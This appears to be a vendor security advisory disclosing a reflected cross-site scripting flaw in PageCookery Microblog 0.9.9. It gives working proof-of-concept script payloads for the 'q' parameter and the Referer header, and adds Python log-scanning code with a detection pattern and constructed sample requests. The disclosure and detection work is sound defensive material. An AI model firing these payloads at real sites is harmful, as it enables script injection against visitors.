XSS Vulnerability in PageCookery Microblog
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in PageCookery Microblog
Software: PageCookery 0.9.9 and possibly below.
Vendor Homepage: http://pagecookery.com/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-026
Description
PageCookery is the first publicly released single-user edition of the open source microblogging program. Built on a PHP + MySQL architecture with a focus on safety, efficiency and stability, it is a Web 2.0 microblog solution built around the concepts of "sharing" and "discovery".
Details
PageCookery Microblog 0.9.9 is affected by a cross-site scripting vulnerability.
PageCookery Microblog PoC URLs are as follows:
- Cross-site Scripting
http://example.com/MD/?act=login
(payload sent in the Referer header) '"--></style></scRipt><scRipt>alert(0x000271)</scRipt>
http://example.com/MD/?q=';"--></style></scRipt><scRipt>alert(0x0000C2)</scRipt>
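Log-based detection for the two reflection points listed above (the `q` parameter and the Referer header sent to `?act=login`), as an added example that is not part of the original advisory. It assumes Apache/nginx combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format; a quote inside a logged string appears as \" so allow escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# Markup that has no business in a Referer header or in PageCookery's ?q= value; matched after
# URL-decoding and case-insensitively, so "scRipt" and "%3Cscript" are both caught.
MARKUP_RE = re.compile(r"</?\s*(script|style)\b|javascript:", re.IGNORECASE)

def decode(value: str) -> str:
    """Bounded repeated URL-decoding so a double-encoded %253C still ends up as '<'."""
    for _ in range(3):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def suspicious_fields(line: str) -> list:
    """Names of the reflected inputs ('q', 'referer') in one log line that carry markup."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    parts = m.group("request").split(" ")  # e.g. ["GET", "/MD/?q=...", "HTTP/1.1"]
    query = parts[1].partition("?")[2] if len(parts) >= 2 else ""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == "q" and MARKUP_RE.search(decode(val)):
            hits.append("q")
    # The login page (?act=login) reflects the Referer header, so inspect it on every request.
    if MARKUP_RE.search(decode(m.group("referer"))):
        hits.append("referer")
    return hits

def scan(lines):
    """(client IP, flagged fields) for every line that carries a payload; feed this to a SIEM."""
    return [(LOG_RE.match(l).group("ip"), f) for l in lines if (f := suspicious_fields(l))]
# Constructed sample lines (not from a real server): the advisory's two PoC requests,
# percent-encoded as a browser would send them, followed by a benign search.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Aug/2014:10:01:22 +0000] "GET /MD/?q=%27%3B%22--%3E%3C/style%3E%3C/scRipt%3E'
    '%3CscRipt%3Ealert(0x0000C2)%3C/scRipt%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Aug/2014:10:01:30 +0000] "GET /MD/?act=login HTTP/1.1" 200 3200 "http://example.com'
    '/MD/?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x000271)%3C/scRipt%3E" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Aug/2014:10:02:01 +0000] "GET /MD/?q=microblog+search HTTP/1.1" 200 4096 '
    '"http://example.com/MD/" "Mozilla/5.0"',
]
```

`scan(SAMPLE_LOG)` flags the first two constructed lines (payload in `q`, then in the Referer) and leaves the benign search untouched.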
Advisory Timeline
29/04/2014 – First Contact
07/06/2014 – Second Contact
14/08/2014 – Advisory released
Credits
It was discovered during testing of Invicti Web Application Security Scanner.
About Invicti
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.